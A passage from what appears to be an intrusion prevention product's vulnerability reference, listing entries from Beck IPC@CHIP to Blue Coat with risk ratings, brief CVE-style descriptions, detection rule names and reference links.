About this vulnerability: A vulnerability in Beck GmbH IPC@CHIP
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: Beck GmbH IPC@CHIP
Type: Malfunction
Description: There is a file disclosure vulnerability in Beck GmbH IPC@CHIP which allows an attacker to read the configuration file in an unauthenticated manner.
Situation: HTTP_CSU-Beck-Gmbh-IPC@CHIP-Conf-File-Discosure
References:
CVE-2001-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0749
BID-2775
http://www.securityfocus.com/bid/2775
Back to top

Beck-Ipc-Chip-HTTP-Denial-Of-Service

About this vulnerability: A vulnerability in Beck Ipc@Chip
Risk: High
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Linux
Software: Beck GmbH IPC@CHIP
Type: Malfunction
Description: A vulnerability exists in Beck IPC@Chip. An attacker could send a custom HTTP request causing a denial of service condition.
Situation: HTTP_CRL-Beck-Ipc-Chip-HTTP-Denial-Of-Service
Back to top

Beckhoff-Twincat-DoS

About this vulnerability: A vulnerability in Beckhoff TwinCAT
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Beckhoff TwinCAT
Type: Input Validation
Description: A specially crafted UDP packet can be used to crash TcatSysSrv.exe, causing a denial of service situation.
Situation: Generic_UDP-Beckhoff-Twincat-DoS
References:
CVE-2011-3486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3486
OSVDB-75495
http://www.osvdb.org/75495
Back to top

Belkin-N750-MiniHttpd-Buffer-Overflow

About this vulnerability: A Belkin N750 MiniHttpd Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Belkin MiniHttpd
Type: Input Validation
Description: A buffer overflow vulnerability in Belkin N750 Router in MiniHttpd, firmware versions before F9K1103_WW_1.10.17m, which allows remote attackers to execute arbitrary code in login.cgi via a long string in the jump parameter.
Situation: HTTP_CRL_Belkin-N750-MiniHttpd-Buffer-Overflow
References:
CVE-2014-1635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635
BID-70977
http://www.securityfocus.com/bid/70977
OSVDB-114345
http://www.osvdb.org/114345
Back to top

Belkin-Wemo-UPnP-RCE-CVE-2018-6692

About this vulnerability: A vulnerability in Belkin Wemo
Risk: High
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1324-5242
Platform: Linux; Unix
Software: Belkin Wemo
Type: Input Validation
Description: There exists a buffer overflow vulnerability in libUPnPHndlr.so in Belkin Wemo Insight Smart Plug. A successful exploitation of this vulnerability can lead to arbitrary code execution.
Situation: File-TextId_Belkin-Wemo-UPnP-RCE-CVE-2018-6692
References:
CVE-2018-6692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6692
Back to top

Belkin-Wemo-UPnP-Remote-Code-Execution

About this vulnerability: A vulnerability in Belkin Wemo
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: Belkin Wemo
Type: Input Validation
Description: A vulnerability in Belkin Wemo which allows remote attackers to execute arbitrary code due to insufficient validation of the SmartDevURL parameter.
Situation: HTTP_CSU-Belkin-Wemo-UPnP-Remote-Code-Execution
Back to top

Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation

About this vulnerability: A vulnerability in Bennet-Tec TList
Risk: Moderate
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Bennet-Tec TList; Oracle Hyperion Financial Management
Type: Directory Traversal
Description: An insecure method is exposed by Bennet-Tec's TList ActiveX control. The vulnerability is caused due to the TList.TList.[6-8] (TList[6-8].ocx) control including the insecure "SaveData" method. This can be exploited to create or rewrite arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation: File-Text_Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation
Back to top

BentoML-RCE-CVE-2025-27520

About this vulnerability: A vulnerability in BentoML
Risk: High
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Platform: Generic
Software: BentoML
Type: Input Validation
Description: An vulnerability in BentoML, version v1.4.2, which allows remote attackers to execute arbitrary code on the server through maliciously crafted serialized data.
Situation: File-Text_BentoML-RCE-CVE-2025-27520
References:
CVE-2025-27520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27520
Back to top

BentoML-Runner-Server-RCE-CVE-2025-32375

About this vulnerability: A vulnerability in BentoML
Risk: High
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Platform: Generic
Software: BentoML
Type: Input Validation
Description: An vulnerability in BentoML, versions before v1.4.8, which allows remote attackers to execute arbitrary code on the server through maliciously crafted serialized data by setting specific headers and parameters in the POST request.
Situation: File-Text_BentoML-Runner-Server-RCE-CVE-2025-32375
References:
CVE-2025-32375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32375
Back to top

Berlios-GPSD-Format-String-Vulnerability

About this vulnerability: A Berlios GPSD Format String vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Berlios GPSD
Type: Input Validation
Description: A vulnerability in Berlios GPSD, versions 1.9.0 through 2.7, which allows remote attackers to execute arbitrary code via certain GPS requests containing format string specifiers.
Situation: Generic_CS-Berlios-GPSD-Format-String-Vulnerability
References:
CVE-2004-1388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1388
BID-12371
http://www.securityfocus.com/bid/12371
OSVDB-13199
http://www.osvdb.org/13199
Back to top

Beyondtrust-Command-Injection-CVE-2024-12356

About this vulnerability: An attempt to exploit a vulnerability in BeyondTrust products detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: BeyondTrust Remote Support
Type: Input Validation
Description: A critical vulnerability has been discovered in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products, which can allow an unauthenticated attacker to inject commands that are run as a site user.
Situation: WebSocket_CS-Beyondtrust-Command-Injection-CVE-2024-12356
References:
CVE-2024-12356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12356
Back to top

Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589

About this vulnerability: A vulnerability in BeyondTrust Remote Support
Risk: Moderate
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: BeyondTrust Remote Support
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in BeyondTrust Remote Support versions up to 6.0.1. A successful exploit allows an attacker to run arbitrary scripts in the target user's browser.
Situation: HTTP_CRL-Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589
References:
CVE-2021-31589
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31589
Back to top

Big-Brother-Cgi-Vulnerability

About this vulnerability: Big Brother CGI script vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Big Brother
Type: Directory Traversal
Description: The Big Brother scripts (specifically bb-histlog.sh, bb-histsvc.sh, bb-rep.sh, bb-replog.sh, bb-hist.sh) contain a file disclosure vulnerability that allows viewing of any text files on the system readable by the Web server.
References:
CVE-1999-1462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1462
BID-142
http://www.securityfocus.com/bid/142
Back to top

BigAnt-Buffer-Overflow

About this vulnerability: A vulnerability in BigAnt
Risk: High
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BigAntSoft BigAnt Server
Type: Input Validation
Description: There exists a buffer overflow vulnerability in BigAnt.
Situation: Generic_CS-BigAnt-Buffer-Overflow
References:
OSVDB-61386
http://www.osvdb.org/61386
Back to top

BigAnt-IM-Server-2.2-Buffer-Overflow

About this vulnerability: BigAnt IM Server 2.2 Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BigAntSoft BigAnt Server
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in BigAnt IM Server 2.2, which allows attackers to remotly execute arbitrary code or cause a denial of service via a long URI in a TCP request.
Situation: Generic_CS-BigAnt-IM-Server-2.2-Buffer-Overflow
References:
CVE-2008-1914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1914
BID-28795
http://www.securityfocus.com/bid/28795
OSVDB-44454
http://www.osvdb.org/44454
Back to top

BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in BigAntSoft BigAnt Server
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BigAntSoft BigAnt Server
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in BigAnt Server. The vulnerability is due to a boundary error when handling DDNF requests. Remote unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in arbitrary code injection and execution with the privileges of the target server. If exploitation is unsuccessful, the affected application will terminate abnormally.
Situation: Generic_CS-BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow
References:
OSVDB-92239
http://www.osvdb.org/92239
Back to top

BigAnt-Server-Dupf-Command-Arbitrary-File-Upload

About this vulnerability: A vulnerability in BigAntSoft BigAnt Server
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BigAntSoft BigAnt Server
Type: Directory Traversal
Description: An arbitrary file upload vulnerability exists in BigAnt Server. The vulnerability is due to lack of authentication and a directory traversal weakness in processing a DUPF command. Remote unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in arbitrary code execution with the privileges of the System user.
Situation: Generic_CS-BigAnt-Server-Dupf-Command-Arbitrary-File-Upload
References:
CVE-2012-6274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6274
BID-57214
http://www.securityfocus.com/bid/57214
OSVDB-89342
http://www.osvdb.org/89342
Back to top

BigAnt-Server-SCH-Request-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in BigAntSoft BigAnt Server
Risk: Moderate
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BigAntSoft BigAnt Server
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in BigAnt Server. The vulnerability is due to a boundary error when handling SCH and DUPF requests. Remote unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in arbitrary code injection and execution with the privileges of the target server. If exploitation is unsuccessful, the affected application will terminate abnormally.
Situation: Generic_CS-BigAnt-Server-SCH-Request-Stack-Buffer-Overflow
References:
CVE-2012-6275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6275
BID-57214
http://www.securityfocus.com/bid/57214
OSVDB-89344
http://www.osvdb.org/89344
Back to top

BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258

About this vulnerability: An attempt to exploit a vulnerability in BillQuick Web Suite detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: BillQuick Web Suite
Type: Malfunction
Description: There exists an SQL injection vulnerability in BillQuick Web Suite versions before 22.0.9.1. Successful exploitation may allow remote code execution without authentication.
Situation: HTTP_CRL-BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258
References:
CVE-2021-42258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42258
Back to top

Binary_RealPlayer-RealMedia-Security-Bypass

About this vulnerability: A vulnerability in RealPlayer
Risk: High
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RealPlayer
Type: Input Validation
Description: A vulnerability exists in the way that RealNetworks line of RealPlayer products handle clip-encoded URLs. A malicious website can load a local HTML document within the Microsoft HTML viewer control in the local zone security context by using a specially crafted RealMedia file. An attacker exploiting this flaw can bypass certain security restrictions.
Situation: File-Binary_RealPlayer-RealMedia-Security-Bypass
Back to top

BIND-Inverse-Infoleak

About this vulnerability: BIND server infoleak vulnerability
Risk: Moderate
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Malfunction
Description: BIND DNS servers has a vulnerability that allows remote client to read sensible information. This information can be used to verity existance of other vulnerabilities and to craft attacks leading to remote compromise of the server host.
Situation: DNS-UDP_Inverse-Infoleak-2
DNS-UDP_Inverse-Infoleak
References:
CVE-2001-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0012
BID-2321
http://www.securityfocus.com/bid/2321
Back to top

BIND-Inverse-Query-BO

About this vulnerability: Inverse Query Buffer Overflow in BIND 4.9 and BIND 8 releases
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Buffer Overflow
Description: The ISC BIND DNS daemon and its derivatives contain a buffer overflow vulnerability that is exploitable via inverse query. Once exploited, the attacker may be able to execute arbitrary code as the user under which the MDNS daemon is being run. This user is most likely "root".
Situation: DNS-TCP_X86-Iquery-BOF-1
DNS-TCP_X86-Iquery-BOF-2
DNS-TCP_X86-Iquery-BOF-3
DNS-TCP_Iquery-BOF-12
DNS-TCP_X86-Iquery-BOF-6
DNS-TCP_X86-Iquery-BOF-7
DNS-TCP_X86-Iquery-BOF-9
DNS-TCP_X86-Iquery-BOF-8
DNS-TCP_X86-Iquery-BOF-11
DNS-TCP_X86-BOF-10
DNS-TCP_Iquery-ADM-W0rm-Detection
References:
CVE-1999-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009
BID-134
http://www.securityfocus.com/bid/134
Back to top

BIND-NXT-BO

About this vulnerability: NXT buffer overflow
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: HP-UX; Solaris; IRIX; AIX; Linux; BSD
Software: BIND
Type: Buffer Overflow
Description: The BIND DNS daemon contains a buffer overflow vulnerability that is exploitable via malicious NXT record. Once exploited, the attacker may be able to execute arbitrary code as the user under which the DNS daemon is being run. This user is most likely "root".
Situation: DNS-TCP_X86-BSD-NXT-BOF-1
DNS-TCP_MIPS-IRIX-NXT-BOF
DNS-TCP_X86-Linux-NXT-BOF-1
DNS-TCP_X86-BSD-NXT-BOF-2
DNS-TCP_X86-Linux-NXT-BOF-2
DNS-TCP_Sparc-Solaris-NXT-BOF-1
DNS-TCP_X86-Linux-NXT-BOF-3
References:
CVE-1999-0833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0833
BID-788
http://www.securityfocus.com/bid/788
Back to top

BIND-Opt-Subdomain-Denial-Of-Service

About this vulnerability: BIND denial of service
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: BIND
Type: Malfunction
Description: An attacker can crash the name server by requesting a non-existent subdomain and an OPT record with a large UDP payload.
Situation: DNS-UDP_BIND-Opt-Subdomain-Denial-Of-Service
References:
CVE-2002-1220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1220
BID-6161
http://www.securityfocus.com/bid/6161
Back to top

BIND-Tsig-BO

About this vulnerability: TSIG Record Handling Buffer Overflow in Named 8
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Buffer Overflow
Description: The ISC BIND DNS daemon version 8.2 and its derivatives contain a buffer overflow vulnerability in TSIG record handling. That vulnerability can be remotely exploited and successful exploit leads to remote root compromise. Public sample exploits do exists.
Situation: DNS-UDP_BIND-Tsig-X86-Linux-BOF
DNS-UDP_BIND-Tsig-X86-Linux-BOF-2
DNS-UDP_BIND-Tsig-X86-BOF
References:
CVE-2001-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0010
BID-2302
http://www.securityfocus.com/bid/2302
Back to top

BIND-Version-Query

About this vulnerability: BIND server version query
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Insecure Configuration
Description: BIND DNS servers has a feature that allows remote client to query server's version number. This version number information can be used to determine whether the server is vulnerable to some more dangerous exploits and thus system comrpomise. DNS version queries are often of malicious purpose.
Situation: DNS-TCP_Nameserver-Version-Query
DNS-UDP_Nameserver-Version-Query
Back to top

BisonFTP-Server-Directory-Traversal

About this vulnerability: A BisonFTP Server Directory Traversal vulnerability
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Bisonware FTP Server
Type: Directory Traversal
Description: A vulnerability in BisonFTP Server, version 3.5, which allows remote attackers to read arbitrary files via a ../ directory traversal in the RETR command.
Situation: FTP_CS-Attempted-FTP-Directory-Traversal
References:
CVE-2015-7602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602
Back to top

Bisonware-FTP-Server-Buffer-Overflow

About this vulnerability: A Bisonware FTP Server Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Bisonware FTP Server
Type: Buffer Overflow
Description: A vulnerability in Bisonware FTP Server, versions before 4.1, which allows remote attackers to cause a denial of service condition and execute arbitrary code via a long USER, LIST, or CWD command.
Situation: FTP_CS-ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
References:
CVE-1999-1510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1510
BID-49109
http://www.securityfocus.com/bid/49109
Back to top

Bitcoin-Bot

About this vulnerability: Bitcoin bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1468-5242
Platform: Windows
Software: Bitcoin
Type: Code Injection
Description: Bitcoin bots can be used for mining the cryptocurrency Bitcoin. Bitcoin mining is an energy intensive process and is sometimes used to monetize botnet victims.
Situation: HTTP_CSU-Bitcoin-Bot-Traffic
Back to top

Bitcoin-Miner-Getwork-JSON-Request

About this vulnerability: Bitcoin Miner getwork JSON request detected
Risk: Low
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Bitcoin
Type: Peer-to-Peer
Description: A Getwork-request in application/json context is most likely caused by a bitcoin-compatible cryptocurrency mining application. Bitcoin mining is an energy intensive process and is sometimes used to monetize botnet victims.
Situation: HTTP_CS-Bitcoin-Miner-Getwork-JSON-Request
Back to top

BitDefender-AntiVirus-PDF-Processing-Memory-Corruption

About this vulnerability: A heap corruption vulnerability in BitDefender AntiVirus
Risk: High
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BitDefender; BitDefender Internet Security; BitDefender Total Security
Type: Malfunction
Description: There is a memory corruption vulnerability in various BitDefender security products. The BitDefender PDF Scanner plugin pdf.xmd does not correctly handle crafted PDF documents, leading to a memory corrution. A remote attacker can exploit this vulnerability by delivering a crafted PDF file to the vulnerable system, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
File-PDF_BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
References:
BID-32396
http://www.securityfocus.com/bid/32396
Back to top

BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution

About this vulnerability: A vulnerability in BitDefender Internet Security
Risk: Moderate
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BitDefender Internet Security
Type: Input Validation
Description: There is a cross-site scripting vulnerability in BitDefender Internet Security software. The vulnerability is due to insufficient input validation when scanning maliciously crafted archive files. Remote attackers can exploit this vulnerability by enticing the target users to scan a malicious archive file, which may lead to script execution in the local security zone.
Situation: HTTP_SS-Suspicious-Filename-In-Gzip-Compressed-Archive
HTTP_SS-Suspicious-Filename-In-Zip-Archive
File-Binary_Suspicious-Filename-In-Gzip-Compressed-Archive
File-Zip_Suspicious-Filename-In-Archive
References:
CVE-2009-0850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0850
BID-33921
http://www.securityfocus.com/bid/33921
Back to top

BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in BitDefender Online Scanner
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Softwin BitDefender Online Scanner
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in BitDefender Online Scanner. The vulnerability is due to boundary errors in the BitDefender Online Scanner OScan.ocx ActiveX Control. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
File-Text_BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-5775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5775
BID-26210
http://www.securityfocus.com/bid/26210
Back to top

BitTorrent-Over-Port-80

About this vulnerability: BitTorrent usage detected on port 80
Risk: Moderate
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BitTorrent
Type: Insecure Configuration
Description: BitTorrent usage detected on port 80
Situation: HTTP_CSH-BitTorrent-Over-Port-80
HTTP_SHS-BitTorrent-Over-Port-80
Back to top

BitTorrent-Peer-To-Peer-Network-Usage

About this vulnerability: BitTorrent peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BitTorrent; uTorrent; Azureus; BitComet; rtorrent; Deluge
Type: Peer-to-Peer
Description: BitTorrent is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: Generic_UDP-BitTorrent-UDP-Traffic
Shared_CS-BitTorrent-Tracker-Request
Shared_CS-BitTorrent-Network-Connect
Shared_SS-BitTorrent-Tracker-Response
Shared_SS-BitTorrent-Network-Connect
Shared-UDP_CS-BitTorrent-Network-Connect
HTTP_CSH-Transmission-P2P-Client
HTTP_CSH-KTorrent-Client
HTTP_CSH-Opera-BitTorrent-Client
HTTP_CSH-BitTornado-P2P-Client
HTTP_CSH-Enhanced-CTorrent-P2P-Client
HTTP_CSH-Deluge-P2P-Client
HTTP_CSH-FDM-P2P-Client
HTTP_CSH-BTSP-P2P-Client
HTTP_CSH-Shareaza-P2P-Client
HTTP_SS-BitTorrent-Torrent-Metainfo-File-Download
P2P-UDP_BitTorrent-DHT-Protocol-Usage
HTTP_CSH-P2P-uTorrent-Client
HTTP_CSH-BitComet-Client
HTTP_CSH-Azureus-Client
HTTP_CSH-BitTorrent-Client
HTTP_CSH-Deluge-Client
HTTP_CSH-rtorrent-Client
HTTP_CSH-Blizzard-Downloader-Usage
File-TextId_BitTorrent-Torrent-Metainfo-File
File-TextId_BitTorrent-Tracker-Response
Back to top

Bitweaver-Overlay_Type-Directory-Traversal

About this vulnerability: A Bitweaver Overlay_Type Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Bitweaver
Type: Directory Traversal
Description: A directory traversal vulnerability in Bitweaver 2.8.1 in the overlay_type parameter within gmap/view_overlay.php, which allows remote attackers to read arbitrary files via an encoded dot-dot (%2F) sequence.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2012-5192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5192
OSVDB-86599
http://www.osvdb.org/86599
Back to top

Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download

About this vulnerability: A Black Ice BIDIB.ocx ActiveX Arbitrary File Download vulnerability.
Risk: High
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Black Ice
Type: Input Validation
Description: A vulnerability in Black Ice, in the ActiveX control in BIDIB.ocx, version 10.9.3.0, which allows remote attackers to force a download of arbitrary files by specifying the origin URL in the first argument to the DownloadImageFileURL method, and the local filename in the second argument.
Situation: File-Text_Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download
References:
CVE-2008-2683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2683
BID-29577
http://www.securityfocus.com/bid/29577
OSVDB-46007
http://www.osvdb.org/46007
Back to top

Blackenergy-Bot

About this vulnerability: BlackEnergy bot
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Blackenergy is a Windows malware that can be remote controlled.
Situation: HTTP_CRL-Blackenergy-Bot-Traffic
Back to top

Blackmatter-Ransomware-Remote-Encryption-Attempt

About this vulnerability: BlackMatter ransomware remote encryption attempt was detected
Risk: High
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: BlackMatter ransomware remote encryption attempt was detected.
Situation: SMB-TCP_Blackmatter-Ransomware-Remote-Encryption-Attempt
Back to top

Blazefind

About this vulnerability: BlazeFind
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BlazeFind
Type: Misconfiguration
Description: BlazeFind is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Blazefind
HTTP_CRL-Blazefind
Back to top

BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in BlazeVideo BlazeDVD Professional
Risk: Moderate
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BlazeVideo BlazeDVD Professional
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in BlazeVideo BlazeDVD Pro. The vulnerability is due to a boundary error when processing playlist files. Remote attackers could exploit this vulnerability by persuading users to open such a file using a vulnerable version of the application. Successful exploitation would cause a stack buffer overflow that could allow the attacker to execute arbitrary code in the context of the logged in user.
Situation: File-Text_BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow
References:
BID-69220
http://www.securityfocus.com/bid/69220
OSVDB-105679
http://www.osvdb.org/105679
Back to top

Blizzard-World-Of-Warcraft-Usage

About this vulnerability: World of Warcraft online game usage
Risk: Low
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Blizzard World of Warcraft
Type: Online Game
Description: World of Warcraft is a massively multiplayer online role-playing game (MMORPG) created by Blizzard Entertainment.
Situation: Generic_SS-Blizzard-World-Of-Warcraft
Generic_CS-Blizzard-World-Of-Warcraft-Login
HTTP_CSH-Blizzard-Downloader-Usage
HTTP_CSH-Blizzard-World-Of-Warcraft-Usage
Back to top

Blogspot-Malicious-Script-HTML

About this vulnerability: Blogspot Malicious Script in HTML page detected
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1386-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Malicious script (partially or fully obfuscated), most likely hosted on Blogspot was detected.
Situation: File-Text_Malicious-Script-Blogspot-A-Detected
File-Text_Malicious-Script-Blogspot-Detected
Back to top

Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Blundit
Risk: Moderate
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Blundit
Type: Input Validation
Description: Improper validation of image uploads by upload-images.php causes a vulnerability in the Blubnit CMS. A successful exploit allows an attacker to upload and execute arbitrary files on the target system.
Situation: HTTP_CSH-Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload
References:
CVE-2019-16113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113
Back to top

Bludit-Directory-Traversal-Image-File-Upload

About this vulnerability: A vulnerability in Bludit
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Bludit
Type: Input Validation
Description: There exists a vulnerability in Bludit, version 3.9.2, which allows remote attackers to upload arbitrary files to the server and execute remote code due to insufficient user input validation in the uuid parameter.
Situation: HTTP_CRL-Bludit-Directory-Traversal-Image-File-Upload
References:
CVE-2019-16113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113
Back to top

Blue-Coat-Authentication-Proxy-Buffer-Overflow

About this vulnerability: A Blue Coat Authentication Proxy Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Blue Coat Authentication Proxy
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Blue Coat Authentication Proxy, versions before build 60258, which allows remote attackers to execute arbitrary code via a large packet to the synchronization port.
Situation: Generic_CS-Blue-Coat-Authentication-Proxy-Buffer-Overflow
References:
CVE-2011-5124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5124
OSVDB-72095
http://www.osvdb.org/72095
Back to top

Blue-Coat-BCAAA-Stack-Buffer-Overflow

About this vulnerability: A Blue Coat BCAAA Stack Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Blue Coat BCAAA
